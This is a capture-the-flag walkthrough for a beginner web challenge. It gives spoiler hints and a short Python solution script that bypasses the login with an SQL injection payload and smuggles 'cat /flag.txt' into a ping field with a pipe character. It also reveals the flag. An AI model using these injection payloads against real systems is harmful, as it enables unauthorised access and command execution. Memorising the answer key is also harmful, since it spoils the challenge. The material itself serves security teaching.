# My First Switch walkthrough

This is a beginner challenge to conduct a couple of very basic web exploits. The user is expected to bypass the login page, identify a vulnerable service and cat flag.txt.

## Hints

1. First hint
<details>
<summary>Spoiler warning</summary>
There are no sql protections on the login page.
</details>

2. Second hint
<details>
<summary>Spoiler warning</summary>
system.php has a vulnerable service. You can't use ; nor & characters.
</details>

## Steps

<details>
<summary>Spoiler warning</summary>

Flag requires a bypass of the login page with a basic sqlite sql injection. (' or 1=1;)

Flag:
- Identify this is vulnerable to a basic command injection, however some characters are stripped.
- Use | to append a second command to the ping command. Use it to cat ./flag.txt

```
session = HTMLSession()

print("Exploiting login page")
r = session.post(args.remote + "/login.php", data={'username': 'user', 'password': '\' or 1=1;'})
loginResult = r.url
assert 'loggedin' in loginResult

print("Running exploit for Flag")
r = session.post(args.remote + "/system.php?action=ping", data={'ip': '10.1.1.1 | cat /flag.txt'})
flag = r.html.text
assert 'cybears{f4il3d_1nj3ct10n}' in flag
```

</details>

